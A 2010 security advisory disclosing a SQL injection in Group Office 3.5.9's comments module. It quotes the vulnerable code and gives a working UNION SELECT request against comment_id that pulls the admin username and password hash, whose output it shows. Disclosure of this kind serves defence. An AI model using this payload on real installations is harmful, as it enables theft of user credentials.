# Title
Group Office Remote SQL Injection Vulnerability
# Author
ADEO Security
# Published17/07/2010# Version3.5.9(Possible all versions)# Vendor
http://www.group-office.com
# Download
http://sourceforge.net/projects/group-office/files/3.5/groupoffice-com-3.5.9.tar.gz/download
# Description
"Take your office online with Group-Office groupware. Share projects,
calendars, files and e-mail online with co-workers and clients. Easy
to use and fully customizable, Group-Office takes online collaboration
to the next level."
# Credit
Vulnerability founded by Canberk BOLAT
- Mail: security[AT]adeo.com.tr
- Web: http://security.adeo.com.tr , http://adeosecuritylabs.com
# Vulnerability
Remote attacker can inject sql codes to the system that host target
web application. Its high level vulnerability.
modules/comments/json.php:23 $comment = $comments->get_comment(($_REQUEST['comment_id']));
In json.php 'get_comment' method called with value of HTTP Request
that's name 'comment_id'. In the 'get_comment' method, variable
'$comment_id' inserted to sql query and executed by application.
modules/comments/classes/comments.class.inc.php:
function get_comment($comment_id){
$this->query("SELECT * FROM co_comments WHERE id=".$this->escape($comment_id));...'escape' method can't prevent because attacker don't need single
quotes for successful exploitation.# Exploitation
Request: http://server/groupoffice/modules/comments/json.php?task=comment&comment_id=888881+union+select+1,2,3,4,5,6,(select+concat_ws(0x3a,username,password)+from+go_users+where+id=1)
Response:{"data":{"id":"1","link_id":"2","link_type":"3","user_id":"4","ctime":"01-01-19701:00","mtime":"01-01-19701:00","comments":"admin:$1$sM5wjKS9$wJPfZZWO53uu8eCxjOesS\/","user_name":""},"success":true}
Application's response contains result of the attacker's injected sql codes.
